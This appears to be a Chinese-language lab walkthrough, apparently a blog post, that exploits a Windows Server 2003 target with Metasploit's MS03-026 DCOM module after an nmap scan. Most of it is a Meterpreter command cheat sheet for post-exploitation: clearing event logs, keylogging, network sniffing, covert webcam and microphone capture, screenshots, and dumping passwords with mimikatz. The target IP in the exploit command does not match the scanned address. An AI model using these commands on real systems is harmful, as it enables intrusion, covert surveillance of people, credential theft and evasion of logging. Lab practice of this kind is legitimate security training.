信息收集
靶机的 IP 地址为:192.168.173.136
利用 nmap 工具扫描其开放端口、系统等
整理一下目标系统的相关信息
系统版本:Windows server 2003
开放的端口及服务:
21/tcp ftp135/tcp msrpc139/tcp netbios-ssn445/tcp microsoft-ds777/tcp multiling-http1025/tcp NFS-or-IIS1026/tcp LSA-or-nterm1029/tcp ms-lsa1030/tcp iad16002/tcp X11:27001/tcp afs3-callback7002/tcp afs3-prserver8099/tcp 未知服务
复制代码
漏洞分析
从扫描出的端口发现,目标主机开启了 135 端口,服务为 msrpc(远程过程调用服务),即 Windows 的 RPC 服务。
针对这个服务,我们就可以尝试去利用一下。
漏洞利用
kali 机打开 Metaspolit:
查找所有跟 Windows RPC 相关的漏洞攻击:
使用 MS-03-026 进行攻击:
msf5 > use exploit/windows/dcerpc/ms03_026_dcom
复制代码
为了实施攻击,查看漏洞攻击的选项和条件:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > show options
复制代码
知道攻击所需要的条件,接下来进行设置,只需要设置我们攻击的目标主机即可:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.174.136RHOSTS => 192.168.174.136
复制代码
设置好攻击条件之后,接下来就进行攻击:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit
复制代码
执行攻击命令之后,我们获取到了目标主机的 shell 权限,现在,可以执行命令查看目标主机的一些东西,比如网络配置信息:
如需进一步攻击利用,可配合其他命令进一步操作。
meterpreter 下相关命令
基本系统命令——————————shell 进入目标主机cmd shellreboot 重启目标主机shutdown 关闭目标主机sysinfo 查看目标主机系统信息background 将当前会话放置后台info 查看已有信息模块run 执行已有的模块,输入run后按tab键补全,会列出已有的脚本clearav 清除windows中的应用程序日志、系统日志、安全日志ipconfig 查看网络配置信息netstat 查看网络连接信息getproxy 查看代理信息route 查看路由arp 查看arp信息
复制代码
进程列表:——————————getuid 获取系统ID以及计算机名称getpid 获取当前进程标识符kill 结束进程ps 列出正在运行中的进程
复制代码
鼠标/键盘操作——————————keyscan_start 开启按键记录会话keyscan_stop 终止按键记录会话keyscan_dump 转储从目标主机捕获到的按键记录uictl enable mouse 启用鼠标uictl disable mouse 禁用鼠标uictl enable keyboard 启用键盘uictl disable keyboard 禁用键盘
复制代码
会话——————————enumdesktops 列举所有可访问到的桌面和工作站getdesktop 获取当前Meterpreter桌面setdesktop 变更Meterpreter当前桌面
复制代码
嗅探功能——————————use sniffer 加载嗅探功能sniffer_interfaces 查看网卡sniffer_start 开始对网卡执行嗅探sniffer_stats 查看状态sniffer_stop 停止对网卡的嗅探sniffer_dump 将捕获到的目标主机上的数据转储到本地
复制代码
摄像头命令——————————webcam_list 列举系统所有的摄像头webcam_snap 使用目标主机摄像头拍照record_mic 从主机的默认麦克风中记录环境声音webcam_stream 通过摄像头开启视频
复制代码
远程桌面/截屏——————————enumdesktops 查看可用的桌面getdesktop 获取当前meterpreter 关联的桌面set_desktop 设置meterpreter关联的桌面 -h查看帮助screenshot 截屏use espia 或者使用espia模块截屏 然后输入screengrabrun vnc 使用vnc远程桌面连接
复制代码
抓取密码——————————load mimikatz 查看帮助wdigest 获取Wdigest密码mimikatz_command -f samdump::hashes 执行mimikatz原始命令mimikatz_command -f sekurlsa::searchPasswords
复制代码
评论